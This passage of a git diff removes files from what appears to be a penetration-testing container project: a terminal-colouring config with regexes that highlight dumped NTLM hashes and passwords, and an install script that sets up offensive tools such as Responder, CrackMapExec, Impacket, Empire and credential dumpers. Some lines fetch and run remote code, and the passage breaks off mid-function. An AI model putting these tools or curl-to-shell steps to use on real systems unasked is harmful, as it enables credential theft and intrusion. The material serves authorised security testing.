-regexp=.{1,120}:plain_password_hex:[0-9a-fA-F]{1,600} -colours=green -======= -# SUCCESS Machine Account NTLM keys -regexp=.{1,120}[0-9a-fA-F]{32}:[0-9a-fA-F]{32} -colours=bold green -======= diff --git a/sources/grc/grc.conf b/sources/grc/grc.conf deleted file mode 100644 index 1f6d52dd..00000000 --- a/sources/grc/grc.conf +++ /dev/null @@ -1,320 +0,0 @@ -# cme -(^|[/\w\.]+/)g?crackmapexec\s? -conf.cme - -# rbcd -(^|[/\w\.]+/)g?rbcd.py\s? -conf.rbcd - -# describeTicket -(^|[/\w\.]+/)g?describeTicket.py\s? -conf.describeTicket - -# Get-GPPPassword -(^|[/\w\.]+/)g?Get-GPPPassword.py\s? -conf.getgpppassword - -# ntlmrelayx -(^|[/\w\.]+/)g?ntlmrelayx.py\s? -conf.ntlmrelayx - -# ntlmrelayx -(^|[/\w\.]+/)g?krbrelayx.py\s? -conf.krbrelayx - -# secretsdump -(^|[/\w\.]+/)g?secretsdump.py\s? -conf.secretsdump - -# dementor -(^|[/\w\.]+/)g?dementor.py\s? 
-conf.dementor - -# anything to do with irc -\b\w+\b.*irc.* -conf.irclog - -# log file -\b\w+\b.*log\b -conf.log - -# configure command -(^|[/\w\.]+/)?configure -conf.configure - -# ping command -(^|[/\w\.]+/)(io|o|n|h|arp|l2)?ping[236]?\s -conf.ping - -# traceroute command -(^|[/\w\.]+/)traceroute6?\s -conf.traceroute - -# gcc command -(^|[/\w\.]+/)(g?cc|[gc]\+\+)\s -conf.gcc - -# make command -(^|[/\w\.]+/)g?make\s? -conf.gcc - -# netstat command -(^|[/\w\.]+/)netstat\s? -conf.netstat - -# stat command -(^|[/\w\.]+/)stat\s? -conf.stat - -# ss command -(^|[/\w\.]+/)ss\s? -conf.ss - -# diff command -(^|[/\w\.]+/)diff\s? -conf.diff - -# wdiff command -(^|[/\w\.]+/)wdiff\s? -conf.wdiff - -# last/who command -(^|[/\w\.]+/)(lastb?|who|lastlog)\b -conf.last - -# ldap tools -(^|[/\w\.]+/)ldap -conf.ldap - -# cvs command -(^|[/\w\.]+/)cvs\s? -conf.cvs - -# mount command -(^|[/\w\.]+/)mount\s? -conf.mount - -# findmnt command -(^|[/\w\.]+/)findmnt\s? -conf.findmnt - -# mtr command -(^|[/\w\.]+/)mtr\s? -conf.mtr - -# ps command -(^|[/\w\.]+/)ps\s? -conf.ps - -# dig command -(^|[/\w\.]+/)dig\s? -conf.dig - -# ifconfig command -(^|[/\w\.]+/)ifconfig\s? -conf.ifconfig - -# ls command -(^|[/\w\.]+/)ls\s -conf.ls - -# mount -(^|[/\w\.]+/)mount\s? -conf.mount - -# df -(^|[/\w\.]+/)df\s? -conf.df - -# du -(^|[/\w\.]+/)du\s? -conf.du - -# ip addr/link -(^|[/\w\.]+/)ip a(ddr)*\s? -conf.ipaddr - -(^|[/\w\.]+/)ip ?(-.)* ?l(ink)*\s? -conf.ipaddr - -# ip route -(^|[/\w\.]+/)ip r(oute)*\s? -conf.iproute - -# ip neighbor -(^|[/\w\.]+/)ip n(eighbor)*\s? -conf.ipneighbor - -# ip command - rest of commands -(^|[/\w\.]+/)ip?\s -conf.ip - -# env -(^|[/\w\.]+/)env\s? -conf.env - -# systemctl show -(^|[/\w\.]+/)systemctl show\s? -conf.env - -# iptables -(^|[/\w\.]+/)iptables\s? -conf.iptables - -# lspci -(^|[/\w\.]+/)lspci\s? -conf.lspci - -# lsblk -(^|[/\w\.]+/)lsblk\s? -conf.lsblk - -# lsof -(^|[/\w\.]+/)lsof\s? -conf.lsof - -# blkid -(^|[/\w\.]+/)blkid\s? 
-conf.blkid - -# id -(^|[/\w\.]+/)id\s? -conf.id - -# iostat / sar -(^|[/\w\.]+/)(iostat|sar)\s? -conf.iostat_sar - -# fdisk -(^|[/\w\.]+/)fdisk -l\s? -conf.fdisk - -# free -(^|[/\w\.]+/)free\s? -conf.free - -# findmnt -(^|[/\w\.]+/)findmnt\s? -conf.findmnt - ------------- -# docker - -# docker ps -(^|[/\w\.]+/)docker(-compose)? ps\s? -conf.dockerps - -(^|[/\w\.]+/)docker images\s? -conf.dockerimages - -(^|[/\w\.]+/)docker search\s? -conf.dockersearch - -#(^|[/\w\.]+/)docker pull\s? -#conf.dockerpull - -(^|[/\w\.]+/)docker-machine ls\s? -conf.docker-machinels - -(^|[/\w\.]+/)docker network ls\s? -conf.dockernetwork - -(^|[/\w\.]+/)docker info\s? -conf.dockerinfo - -(^|[/\w\.]+/)docker version\s? -conf.dockerversion ------------- - -# journalctl command -(^|[/\w\.]+/)journalctl?\s -conf.log - -# systemctl command -(^|[/\w\.]+/)systemctl?\s -conf.systemctl - -# sysctl command -(^|[/\w\.]+/)sysctl?\s -conf.sysctl - -# tcpdump command -(^|[/\w\.]+/)tcpdump\s? -conf.tcpdump - -# tune2fs command -(^|[/\w\.]+/)tune2fs\s? -conf.tune2fs - -# lsmod -(^|[/\w\.]+/)lsmod\s? -conf.lsmod - -# lsattr -(^|[/\w\.]+/)lsattr\s? -conf.lsattr - -# semanage --------------------------------- -(^|[/\w\.]+/)semanage boolean\s? -conf.semanageboolean -(^|[/\w\.]+/)semanage fcontext\s? -conf.semanagefcontext -(^|[/\w\.]+/)semanage (user|login|port)\s? -conf.semanageuser - -# getsebool -(^|[/\w\.]+/)getsebool\s? -conf.getsebool - -# ulimit -(^|[/\w\.]+/)ulimit\s? -conf.ulimit - -# vmstat -(^|[/\w\.]+/)vmstat\s? -conf.vmstat - -# dnf -(^|[/\w\.]+/)dnf\s? -conf.dnf - -# nmap -(^|[/\w\.]+/)nmap\s? -conf.nmap - -# uptime | w -(^|[/\w\.]+/)(uptime|w)\b -conf.uptime - -# getfacl -(^|[/\w\.]+/)getfacl\s? -conf.getfacl - -# ntpdate -(^|[/\w\.]+/)ntpdate\s? -conf.ntpdate - -# showmount -(^|[/\w\.]+/)showmount\s? -conf.showmount - -# apache ant command -(^|[/\w\.]+/)ant\s? -conf.ant - -# # apache maven command -(^|[/\w\.]+/)mvn\s? -conf.mvn - -# iwconfig command -(^|[/\w\.]+/)iwconfig\s? 
-conf.iwconfig - - -# lolcat command -(^|[/\w\.]+/)lolcat\s? -conf.lolcat - -# whois -(^|[/\w\.]+/)whois\s? -conf.whois \ No newline at end of file diff --git a/sources/install.sh b/sources/install.sh deleted file mode 100644 index 84c148cc..00000000 --- a/sources/install.sh +++ /dev/null @@ -1,2539 +0,0 @@ -#!/bin/bash -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -VERSION="3.1.12.dev" - -RED='\033[1;31m' -BLUE='\033[1;34m' -GREEN='\033[1;32m' -NOCOLOR='\033[0m' - -function colorecho () { - echo -e "${BLUE}[EXEGOL] $@${NOCOLOR}" -} - -function update() { - colorecho "Updating, upgrading, cleaning" - apt-get -y update && apt-get -y install apt-utils && apt-get -y upgrade && apt-get -y autoremove && apt-get clean -} - -function fapt() { - colorecho "Installing apt-get package: $@" - apt-get install -y --no-install-recommends "$@" || exit -} - -function python-pip() { - colorecho "Installing python-pip (for Python2.7)" - curl --insecure https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py - python get-pip.py - rm get-pip.py -} - -function filesystem() { - colorecho "Preparing filesystem" - mkdir -p /opt/tools/ - mkdir -p /opt/tools/bin/ - mkdir -p /data/ - mkdir -p /opt/resources/ - mkdir -p /opt/resources/windows/ - mkdir -p /opt/resources/linux/ - mkdir -p /opt/resources/mac/ - mkdir -p /opt/resources/cracking/ - mkdir -p /opt/resources/webshells/ - mkdir -p /opt/resources/webshells/PHP/ - mkdir -p /opt/resources/webshells/ASPX/ - mkdir -p /opt/resources/webshells/JSP/ - mkdir -p "/opt/resources/encrypted disks/" -} - -function install_ohmyzsh() { - colorecho "Installing oh-my-zsh, config, history, aliases" - sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" - cp -v /root/sources/zsh/history ~/.zsh_history - cp -v /root/sources/zsh/aliases /opt/.zsh_aliases - cp -v /root/sources/zsh/zshrc ~/.zshrc - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/zsh-users/zsh-autosuggestions - git -C 
~/.oh-my-zsh/custom/plugins/ clone https://github.com/zsh-users/zsh-syntax-highlighting - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/zsh-users/zsh-completions - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/agkozak/zsh-z - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/lukechilds/zsh-nvm - zsh -c "source ~/.oh-my-zsh/custom/plugins/zsh-nvm/zsh-nvm.plugin.zsh" # this is needed to start an instance of zsh to have the plugin set up -} - -function locales() { - colorecho "Configuring locales" - apt-get -y install locales - sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && locale-gen -} - -function tmux() { - colorecho "Installing tmux" - apt-get -y install tmux - cp -v /root/sources/tmux/tmux.conf ~/.tmux.conf - touch ~/.hushlogin -} - -function install_responder() { - colorecho "Installing Responder" - git -C /opt/tools/ clone https://github.com/lgandx/Responder - sed -i 's/ Random/ 1122334455667788/g' /opt/tools/Responder/Responder.conf - sed -i 's/files\/AccessDenied.html/\/opt\/tools\/Responder\/files\/AccessDenied.html/g' /opt/tools/Responder/Responder.conf - sed -i 's/files\/BindShell.exe/\/opt\/tools\/Responder\/files\/BindShell.exe/g' /opt/tools/Responder/Responder.conf - sed -i 's/certs\/responder.crt/\/opt\/tools\/Responder\/certs\/responder.crt/g' /opt/tools/Responder/Responder.conf - sed -i 's/certs\/responder.key/\/opt\/tools\/Responder\/certs\/responder.key/g' /opt/tools/Responder/Responder.conf - fapt gcc-mingw-w64-x86-64 - x86_64-w64-mingw32-gcc /opt/tools/Responder/tools/MultiRelay/bin/Runas.c -o /opt/tools/Responder/tools/MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv - x86_64-w64-mingw32-gcc /opt/tools/Responder/tools/MultiRelay/bin/Syssvc.c -o /opt/tools/Responder/tools/MultiRelay/bin/Syssvc.exe -municode - cd /opt/tools/Responder - /opt/tools/Responder/certs/gen-self-signed-cert.sh -} - -function Sublist3r() { - colorecho "Installing Sublist3r" - git -C /opt/tools/ clone 
https://github.com/aboul3la/Sublist3r.git - python3 -m pip install -r /opt/tools/Sublist3r/requirements.txt -} - -function ReconDog() { - colorecho "Installing ReconDog" - git -C /opt/tools/ clone https://github.com/s0md3v/ReconDog - python3 -m pip install -r /opt/tools/ReconDog/requirements.txt -} - -function githubemail() { - colorecho "Installing github-email" - npm install --global github-email -} - -function onionsearch() { - colorecho "Installing onionsearch" - git -C /opt/tools/ clone https://github.com/megadose/onionsearch - cd /opt/tools/onionsearch - python3 setup.py install - rm -rf /opt/tools/onionsearch -} - -function photon() { - colorecho "Installing photon" - git -C /opt/tools/ clone https://github.com/s0md3v/photon - python3 -m pip install -r /opt/tools/photon/requirements.txt -} - - -function WikiLeaker() { - colorecho "Installing WikiLeaker" - git -C /opt/tools/ clone https://github.com/jocephus/WikiLeaker.git - python3 -m pip install -r /opt/tools/WikiLeaker/requirements.txt -} - - -function OSRFramework() { - colorecho "Installing OSRFramework" - python3 -m pip install osrframework -} - -function sn0int() { - colorecho "Installing sn0int" - apt-get install debian- -y - gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add - - apt-key adv --keyserver keyserver.ubuntu.com --refresh-keys git@rxv.cc - echo deb http://apt.vulns.sexy stable main > /etc/apt/sources.list.d/apt-vulns-sexy.list - apt-get update -y - apt-get install sn0int -y - apt-get install --fix-broken -y -} - -function install_CloudFail() { - colorecho "Installing CloudFail" - git -C /opt/tools/ clone https://github.com/m0rtem/CloudFail - python3 -m pip install -r /opt/tools/CloudFail/requirements.txt -} - -function OneForAll() { - colorecho "Installing OneForAll" - git -C /opt/tools/ clone https://github.com/shmilylty/OneForAll.git - python3 -m pip install -r /opt/tools/OneForAll/requirements.txt -} - -function install_EyeWitness() { - 
colorecho "Installing EyeWitness" - git -C /opt/tools/ clone https://github.com/FortyNorthSecurity/EyeWitness - cd /opt/tools/EyeWitness/Python/setup - ./setup.sh -} - -function install_wafw00f() { - colorecho "Installing wafw00f" - git -C /opt/tools/ clone https://github.com/EnableSecurity/wafw00f - cd /opt/tools/wafw00f - python setup.py install -} - -function JSParser() { - colorecho "Installing JSParser" - git -C /opt/tools/ clone https://github.com/nahamsec/JSParser - cd /opt/tools/JSParser - python setup.py install -} - -function LinkFinder() { - colorecho "Installing LinkFinder" - git -C /opt/tools/ clone https://github.com/GerbenJavado/LinkFinder.git - cd /opt/tools/LinkFinder - python3 -m pip install -r requirements.txt - python3 setup.py install -} - -function SSRFmap() { - colorecho "Installing SSRFmap" - git -C /opt/tools/ clone https://github.com/swisskyrepo/SSRFmap - cd /opt/tools/SSRFmap - python3 -m pip install -r requirements.txt -} - -function NoSQLMap() { - colorecho "Installing NoSQLMap" - git -C /opt/tools clone https://github.com/codingo/NoSQLMap.git - cd /opt/tools/NoSQLMap - python setup.py install -} - -function install_odat() { - odat_latest=$(curl -L -s https://github.com/quentinhardy/odat/releases/latest | grep tar.gz | cut -d '"' -f 2 | head -1) - wget "https://github.com/$odat_latest" -O /tmp/odat_latest.tar.gz - mkdir -p /opt/tools/odat - tar xvf /tmp/odat_latest.tar.gz -C /opt/tools/odat --strip=2 - mv /opt/tools/odat/odat* /opt/tools/odat/odat - echo -e '#!/bin/sh\n(cd /opt/tools/odat/ && ./odat $@)' > /usr/local/bin/odat - chmod +x /usr/local/bin/odat -} - -function fuxploider() { - colorecho "Installing fuxploider" - git -C /opt/tools/ clone https://github.com/almandin/fuxploider.git - cd /opt/tools/fuxploider - python3 -m pip install -r requirements.txt -} - -function CORScanner() { - colorecho "Installing CORScanner" - git -C /opt/tools/ clone https://github.com/chenjj/CORScanner.git - cd /opt/tools/CORScanner - python -m pip 
install -r requirements.txt -} - -function Blazy() { - colorecho "Installing Blazy" - git -C /opt/tools/ clone https://github.com/UltimateHackers/Blazy - cd /opt/tools/Blazy - python -m pip install -r requirements.txt -} - -function XSStrike() { - colorecho "Installing XSStrike" - git -C /opt/tools/ clone https://github.com/s0md3v/XSStrike.git - python3 -m pip install fuzzywuzzy -} - -function install_XSpear() { - colorecho "Installing XSpear" - gem install XSpear -} - -function install_pass_station() { - colorecho "Installing Pass Station" - gem install pass-station -} - -function evilwinrm() { - colorecho "Installing evil-winrm" - gem install evil-winrm -} - -function Bolt() { - colorecho "Installing Bolt" - git -C /opt/tools/ clone https://github.com/s0md3v/Bolt.git -} - -function install_crackmapexec() { - colorecho "Installing CrackMapExec" - apt-get -y install libssl-dev libffi-dev python2-dev build-essential python3-winrm python3-venv - git -C /opt/tools/ clone --recursive https://github.com/byt3bl33d3r/CrackMapExec - cd /opt/tools/CrackMapExec - # Redefining baseDN from domain name instead of KDC - curl --location https://github.com/byt3bl33d3r/CrackMapExec/pull/535.patch | git apply --verbose - python3 -m pipx install . 
- mkdir -p ~/.cme - cp -v /root/sources/crackmapexec/cme.conf ~/.cme/cme.conf - # this is for having the ability to check the source code when working with modules and so on - #git -C /opt/tools/ clone https://github.com/byt3bl33d3r/CrackMapExec -# apt-get -y install crackmapexec - cp -v /root/sources/grc/conf.cme /usr/share/grc/conf.cme -} - -function install_lsassy() { - colorecho "Installing lsassy" - git -C /opt/tools/ clone https://github.com/Hackndo/lsassy/ - cd /opt/tools/lsassy - git checkout 3.0.0 - git pull origin 3.0.0 - python3 setup.py install - # python3 -m pip install 'asn1crypto>=1.3.0' -} - -function sprayhound() { - colorecho "Installing sprayhound" - git -C /opt/tools/ clone https://github.com/Hackndo/sprayhound - cd /opt/tools/sprayhound - apt-get -y install libsasl2-dev libldap2-dev - python3 -m pip install "pyasn1<0.5.0,>=0.4.6" - python3 setup.py install -} - -function install_impacket() { - colorecho "Installing Impacket scripts" - git -C /opt/tools/ clone https://github.com/SecureAuthCorp/impacket - cd /opt/tools/impacket/ - # 1063: User-defined password for LDAP attack addComputer - # 1249: Shadow Credentials in ntlmrelayx.py - # 1135: Improved searchFilter for GetUserSPNs - # 1184: Added user filter on findDelegation - # 1201: Added describeTicket - # 1202: Added self for getST - # 1224: Added renameMachine.py - # 1253: Added LSA dump on top of SAM dump for ntlmrelayx - # 1256: Added tgssub script for service substitution - # 1265: Fixes Ccache to Kirbi conversion issues - # 1267: Better handling of various XML files in Group Policy Preferences - # 1270: Fix ticketer duration to support default 10 hours tickets - git config --global user.email "exegol@install.er" - git config --global user.name "Exegol installer" - prs="1063 1249 1135 1184 1201 1202 1224 1253 1256 1265 1267 1270" - for pr in $prs; do git fetch origin pull/$pr/head:pull/$pr && git merge --no-edit pull/$pr; done - python3 -m pip install . 
- cp -v /root/sources/grc/conf.ntlmrelayx /usr/share/grc/conf.ntlmrelayx - cp -v /root/sources/grc/conf.secretsdump /usr/share/grc/conf.secretsdump - cp -v /root/sources/grc/conf.getgpppassword /usr/share/grc/conf.getgpppassword - cp -v /root/sources/grc/conf.rbcd /usr/share/grc/conf.rbcd - cp -v /root/sources/grc/conf.describeTicket /usr/share/grc/conf.describeTicket -} - -function install_bloodhound.py() { - colorecho "Installing and Python ingestor for BloodHound" - git -C /opt/tools/ clone https://github.com/fox-it/BloodHound.py -} - -function neo4j_install() { - colorecho "Installing neo4j" - wget -O - https://debian.neo4j.com/neotechnology.gpg.key | apt-key add - - echo 'deb https://debian.neo4j.com stable latest' | tee /etc/apt/sources.list.d/neo4j.list - apt-get update - apt-get -y install --no-install-recommends gnupg libgtk2.0-bin libcanberra-gtk-module libx11-xcb1 libva-glx2 libgl1-mesa-glx libgl1-mesa-dri libgconf-2-4 libasound2 libxss1 - apt-get -y install neo4j - #mkdir /usr/share/neo4j/conf - neo4j-admin set-initial-password exegol4thewin - mkdir -p /usr/share/neo4j/logs/ - touch /usr/share/neo4j/logs/neo4j.log -} - -function cypheroth() { - colorecho "Installing cypheroth" - git -C /opt/tools/ clone https://github.com/seajaysec/cypheroth/ -} - -function mitm6_sources() { - colorecho "Installing mitm6 from sources" - git -C /opt/tools/ clone https://github.com/fox-it/mitm6 - cd /opt/tools/mitm6/ - python3 -m pip install -r requirements.txt - python3 setup.py install -} - -function mitm6_pip() { - colorecho "Installing mitm6 with pip" - python3 -m pip install service_identity - python3 -m pip install mitm6 - cd /usr/lib/x86_64-linux-gnu/ - ln -s -f libc.a liblibc.a -} - -function aclpwn() { - colorecho "Installing aclpwn with pip" - python3 -m pip install aclpwn - sed -i 's/neo4j.v1/neo4j/g' /usr/local/lib/python3.8/dist-packages/aclpwn/database.py -} - -function IceBreaker() { - colorecho "Installing IceBreaker" - apt-get -y install lsb-release 
python3-libtmux python3-libnmap python3-ipython - python -m pip install pipenva - git -C /opt/tools/ clone https://github.com/DanMcInerney/icebreaker - cd /opt/tools/icebreaker/ - ./setup.sh - pipenv --three install -} - -function install_routersploit() { - colorecho "Installing RouterSploit" - git -C /opt/tools/ clone https://www.github.com/threat9/routersploit - cd /opt/tools/routersploit - python3 -m pip install -r requirements.txt -} - -function Empire() { - colorecho "Installing Empire" - export STAGING_KEY=$(echo exegol4thewin | md5sum | cut -d ' ' -f1) - python -m pip install pefile - git -C /opt/tools/ clone https://github.com/BC-SECURITY/Empire - cd /opt/tools/Empire/setup - ./install.sh -} - -function Sn1per() { - colorecho "Installing Sn1per" - git -C /opt/tools/ clone https://github.com/1N3/Sn1per - sed -i 's/read answer/echo no answer to give/' /opt/tools/Sn1per/install.sh - sed -i 's/cp/cp -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/mkdir/mkdir -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/rm/rm -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/mv/mv -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/wget/wget -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/2> \/dev\/null//g' /opt/tools/Sn1per/install.sh - cd /opt/tools/Sn1per/ - bash install.sh -} - -function dementor() { - colorecho "Installing dementor" - mkdir /opt/tools/dementor - python -m pip install pycryptodomex - wget -O /opt/tools/dementor/dementor.py https://gist.githubusercontent.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc/raw/7c7f09ea46eff4ede636f69c00c6dfef0541cd14/dementor.py -} - -function assetfinder() { - colorecho "Installing assetfinder" - go install -v github.com/tomnomnom/assetfinder@latest -} - -function install_subfinder() { - colorecho "Installing subfinder" - go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest -} - -function install_gobuster() { - colorecho "Installing gobuster" - go install github.com/OJ/gobuster/v3@latest -} - -function 
install_kiterunner() { - colorecho "Installing kiterunner (kr)" - git -C /opt/tools/ clone https://github.com/assetnote/kiterunner.git - cd /opt/tools/kiterunner - wget https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz - wget https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz - make build - ln -s $(pwd)/dist/kr /opt/tools/bin/kr -} - -function install_dirsearch() { - colorecho "Installing dirsearch" - git -C /opt/tools/ clone https://github.com/maurosoria/dirsearch - cd /opt/tools/dirsearch/ - python3 -m pip install . -} - -function install_cmsmap() { - colorecho "Installing CMSmap" - git -C /opt/tools/ clone https://github.com/Dionach/CMSmap.git - cd /opt/tools/CMSmap/ - python3 -m pip install . - cmsmap -U PC -} - -function install_tomcatwardeployer() { - colorecho "Installing tomcatWarDeployer" - git -C /opt/tools/ clone https://github.com/mgeeky/tomcatWarDeployer.git - cd /opt/tools/tomcatWarDeployer/ - python -m pip install -r requirements.txt -} - -function install_clusterd() { - colorecho "Installing clusterd" - git -C /opt/tools/ clone https://github.com/hatRiot/clusterd.git - cd /opt/tools/clusterd/ - python -m pip install -r requirements.txt - echo -e '#!/bin/sh\n(cd /opt/tools/clusterd/ && python clusterd.py $@)' > /usr/local/bin/clusterd - chmod +x /usr/local/bin/clusterd -} - -function install_moodlescan() { - colorecho "Installing moodlescan" - git -C /opt/tools/ clone https://github.com/inc0d3/moodlescan.git - cd /opt/tools/moodlescan/ - python3 -m pip install -r requirements.txt - /opt/tools/moodlescan/moodlescan.py -a -} - -function install_arjun() { - colorecho "Installing arjun" - python3 -m pip install arjun -} - -function amass() { - colorecho "Installing amass" - go install -v github.com/OWASP/Amass/v3/...@latest -} - -function install_ffuf() { - colorecho "Installing ffuf" - go install -v github.com/ffuf/ffuf@latest -} - -function install_waybackurls() { - colorecho "Installing waybackurls" - 
go install -v github.com/tomnomnom/waybackurls@latest -} - -function install_gitrob(){ - colorecho "Installing gitrob" - go install -v github.com/michenriksen/gitrob@latest -} - -function gron() { - colorecho "Installing gron" - go install -v github.com/tomnomnom/gron@latest -} - -function timing_attack() { - colorecho "Installing timing_attack" - gem install timing_attack -} - -function updog() { - colorecho "Installing updog" - python3 -m pip install updog -} - -function findomain() { - colorecho "Installing findomain" - wget -O /opt/tools/bin/findomain https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux - chmod +x /opt/tools/bin/findomain -} - -function install_proxychains() { - colorecho "Installing proxychains" - git -C /opt/tools/ clone https://github.com/rofl0r/proxychains-ng - cd /opt/tools/proxychains-ng/ - ./configure --prefix=/usr --sysconfdir=/etc - make - make install - make install-config - cp -v /root/sources/proxychains/proxychains.conf /etc/proxychains.conf -} - -function install_grc() { - colorecho "Installing and configuring grc" - apt-get -y install grc - cp -v /root/sources/grc/grc.conf /etc/grc.conf -} - -function install_nvm() { - colorecho "Installing nvm (in zsh context)" - zsh -c "source ~/.zshrc && nvm install node" -} - -function pykek() { - colorecho "Installing Python Kernel Exploit Kit (pykek) for MS14-068" - git -C /opt/tools/ clone https://github.com/preempt/pykek -} - -function install_autorecon() { - colorecho "Installing autorecon" - apt-get -y install wkhtmltopdf oscanner tnscmd10g - git -C /opt/tools/ clone https://github.com/Tib3rius/AutoRecon - cd /opt/tools/AutoRecon/ - python3 -m pip install -r requirements.txt - chmod +x /opt/tools/AutoRecon/autorecon.py -} - -function install_simplyemail() { - colorecho "Installing SimplyEmail" - git -C /opt/tools/ clone https://github.com/SimplySecurity/SimplyEmail.git - cd /opt/tools/SimplyEmail/ - sudo bash setup/setup.sh -} - -function privexchange() { - 
colorecho "Installing privexchange" - git -C /opt/tools/ clone https://github.com/dirkjanm/PrivExchange -} - -function LNKUp() { - colorecho "Installing LNKUp" - git -C /opt/tools/ clone https://github.com/Plazmaz/LNKUp - cd /opt/tools/LNKUp - python -m pip install -r requirements.txt -} - -function pwntools() { - colorecho "Installing pwntools" - python -m pip install pwntools - python3 -m pip install pwntools -} - -function install_angr() { - colorecho "Installing angr" - python -m pip install angr - python3 -m pip install angr -} - -function pwndbg() { - colorecho "Installing pwndbg" - apt-get -y install python3.8 python3.8-dev - git -C /opt/tools/ clone https://github.com/pwndbg/pwndbg - cd /opt/tools/pwndbg - ./setup.sh - echo 'set disassembly-flavor intel' >> ~/.gdbinit -} - -function darkarmour() { - colorecho "Installing darkarmour" - git -C /opt/tools/ clone https://github.com/bats3c/darkarmour - cd /opt/tools/darkarmour - apt-get -y install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode -} - -function powershell() { - colorecho "Installing powershell" - apt-get -y install powershell - mv /opt/microsoft /opt/tools/microsoft - rm /usr/bin/pwsh - ln -s /opt/tools/microsoft/powershell/7/pwsh /usr/bin/pwsh -} - -function install_fzf() { - colorecho "Installing fzf" - git -C /opt/tools/ clone --depth 1 https://github.com/junegunn/fzf.git - cd /opt/tools/fzf - ./install --all -} - -function install_shellerator() { - colorecho "Installing shellerator" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/shellerator - cd /opt/tools/shellerator - python3 -m pipx install . -} - -function install_uberfile() { - colorecho "Installing uberfile" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/uberfile - cd /opt/tools/uberfile/ - python3 -m pipx install . 
-} - -function kadimus() { - colorecho "Installing kadimus" - apt-get -y install libcurl4-openssl-dev libpcre3-dev libssh-dev - git -C /opt/tools/ clone https://github.com/P0cL4bs/Kadimus - cd /opt/tools/Kadimus - make -} - -function install_testssl() { - colorecho "Installing testssl" - apt-get -y install bsdmainutils - git -C /opt/tools/ clone --depth 1 https://github.com/drwetter/testssl.sh.git -} - -function install_bat() { - colorecho "Installing bat" - version=$(curl -s https://api.github.com/repos/sharkdp/bat/releases/latest | grep "tag_name" | cut -d 'v' -f2 | cut -d '"' -f1) - wget https://github.com/sharkdp/bat/releases/download/v$version/bat_$version\_amd64.deb - fapt -f ./bat_$version\_amd64.deb - rm bat_$version\_amd64.deb -} - -function install_mdcat() { - colorecho "Installing mdcat" - version=$(curl -s https://api.github.com/repos/lunaryorn/mdcat/releases/latest | grep "tag_name" | cut -d '"' -f4) - wget https://github.com/lunaryorn/mdcat/releases/download/$version/$version-x86_64-unknown-linux-musl.tar.gz - tar xvfz $version-x86_64-unknown-linux-musl.tar.gz - mv $version-x86_64-unknown-linux-musl/mdcat /opt/tools/bin - rm -r $version-x86_64-unknown-linux-musl.tar.gz $version-x86_64-unknown-linux-musl - chown root:root /opt/tools/bin/mdcat -} - -function xsrfprobe() { - colorecho "Installing XSRFProbe" - git -C /opt/tools/ clone https://github.com/0xInfection/XSRFProbe - cd /opt/tools/XSRFProbe - python3 setup.py install -} - -function krbrelayx() { - colorecho "Installing krbrelayx" - python -m pip install dnstool==1.15.0 - git -C /opt/tools/ clone https://github.com/dirkjanm/krbrelayx - cd /opt/tools/krbrelayx/ - cp -v /root/sources/grc/conf.krbrelayx /usr/share/grc/conf.krbrelayx -} - -function hakrawler() { - colorecho "Installing hakrawler" - go install -v github.com/hakluke/hakrawler@latest -} - -function install_jwt_tool() { - colorecho "Installing JWT tool" - git -C /opt/tools/ clone https://github.com/ticarpi/jwt_tool - python3 -m pip 
install pycryptodomex -} - -function jwt_cracker() { - colorecho "Installing JWT cracker" - apt-get -y install npm - npm install --global jwt-cracker -} - -function wuzz() { - colorecho "Installing wuzz" - go install -v github.com/asciimoo/wuzz@latest -} - -function gf_install() { - colorecho "Installing gf" - mkdir ~/.gf - go install -v github.com/tomnomnom/gf@latest - echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.zsh' | tee -a ~/.zshrc - cp -rv ~/go/src/github.com/tomnomnom/gf/examples/* ~/.gf - # TODO: fix this when building : cp: cannot stat '/root/go/src/github.com/tomnomnom/gf/examples/*': No such file or directory - gf -save redirect -HanrE 'url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file=' -} - -function rockyou() { - colorecho "Decompressing rockyou.txt" - gunzip -d /usr/share/wordlists/rockyou.txt.gz -} - -function rbcd-attack() { - colorecho "Installing rbcd-attack" - git -C /opt/tools/ clone https://github.com/tothi/rbcd-attack -} - -function rbcd-permissions() { - colorecho "Installing rbcd_permissions (alternative to rbcd-attack)" - git -C /opt/tools/ clone https://github.com/NinjaStyle82/rbcd_permissions -} - -function pypykatz() { - colorecho "Installing pypykatz" - python3 -m pip install pypykatz -} - -function enyx() { - colorecho "Installing enyx" - git -C /opt/tools/ clone https://github.com/trickster0/Enyx -} - -function enum4linux-ng() { - colorecho "Installing enum4linux-ng" - git -C /opt/tools/ clone https://github.com/cddmp/enum4linux-ng -} - -function install_git-dumper() { - colorecho "Installing git-dumper" - git -C /opt/tools/ clone https://github.com/arthaud/git-dumper - cd 